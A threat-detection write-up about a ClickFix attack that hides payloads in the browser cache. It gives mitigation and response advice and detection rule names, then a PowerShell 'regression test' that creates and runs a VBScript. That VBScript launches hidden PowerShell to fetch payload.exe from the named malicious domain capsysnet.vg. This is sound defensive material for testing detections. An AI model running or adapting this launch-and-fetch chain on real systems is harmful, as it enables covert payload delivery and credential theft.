ClickFix Attack Delivers Payloads via Browser Cache
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A new ClickFix attack variation uses compromised websites to pre-fetch malicious scripts into a web browser’s cache, disguised as legitimate files like PNGs. Victims are social engineered into executing commands via the Windows Run dialog, which then triggers the execution of the cached payload to bypass character limits and security controls. This technique eventually leads to credential theft through memory injection into legitimate processes.
Investigation
Microsoft Threat Intelligence and other researchers identified a multi-stage infection chain involving VBScript, PowerShell, and .NET assemblies. The attack chain uses browser cache smuggling to hide payloads and employs WMI to harvest host information. The investigation highlighted the use of legitimate system tools like cmd.exe, wscript.exe, and timeout.exe to facilitate the attack.
Mitigation
Organizations should implement cloud-delivered, web, and network protection alongside application control and PowerShell script-block logging. Users should be educated to never paste commands into Windows Run, Terminal, or PowerShell when prompted by website errors or CAPTCHAs. Monitoring for suspicious browser activity and WScript/PowerShell child processes is also recommended.
Response
Upon detection, hunt for suspicious activities in the RunMRU registry key and monitor for unusual scheduled tasks. Investigate child processes spawned from WScript or PowerShell and check for unauthorized .NET assemblies loaded into memory. Isolate affected systems and review network logs for outbound connections to known malicious domains.
Attack Flow
We are still updating this part.
Detections
Possible Execution by Use of Short Script Name (via cmdline)
Possible Hands-on or Scripting Operation was Performed in Unusual Folders (via cmdline)
LOLBAS WScript / CScript (via process_creation)
Detection of PowerShell and VBScript Execution via Browser Cache Smuggling [Windows Powershell]
Simulation Execution
-
Attack Narrative & Commands: The adversary leverages a social engineering tactic where a user is prompted to “fix” a browser error. This process smuggles a malicious VBScript into a temporary directory (simulating the browser cache). The adversary then executes this VBScript using
wscript.exe. The VBScript is crafted to call PowerShell with the-WindowStyle Hiddenflag to avoid user detection and attempts to connect to the domaincapsysnet.vgto fetch a secondary payload. This sequence is designed to trigger the specific string-based detection logic in the rule. -
Regression Test Script:
# Simulation Script: ClickFix Payload Smuggling Mimicry $tempDir = $env:TEMP $vbsPath = Join-Path $tempDir "malicious_smuggled.vbs" # Create a VBScript that simulates the malicious behavior # It attempts to call PowerShell with the specific string the rule looks for # and references the suspicious domain. $vbsContent = @" Set objShell = CreateObject("WScript.Shell") ' Simulate calling a script named v.ps1 with hidden window style ' and connecting to the suspicious domain objShell.Run "powershell.exe -File v.ps1 -WindowStyle Hidden -Url http://capsysnet.vg/payload.exe", 0, True "@ Set-Content -Path $vbsPath -Value $vbsContent Write-Host "[+] Malicious VBScript created at: $vbsPath" Write-Host "[+] Executing VBScript via wscript.exe to trigger detection..." # Execute the VBScript Start-Process "wscript.exe" -ArgumentList "`"$vbsPath`"" Write-Host "[+] Simulation command sent. Check SIEM for alerts." -
Cleanup Commands:
# Cleanup: Remove the simulated malicious files $tempDir = $env:TEMP $vbsPath = Join-Path $tempDir "malicious_smuggled.vbs" if (Test-Path $vbsPath) { Remove-Item -Path $vbsPath -Force Write-Host "[+] Cleanup complete: $vbsPath removed." } else { Write-Host "[!] Cleanup failed: File not found." }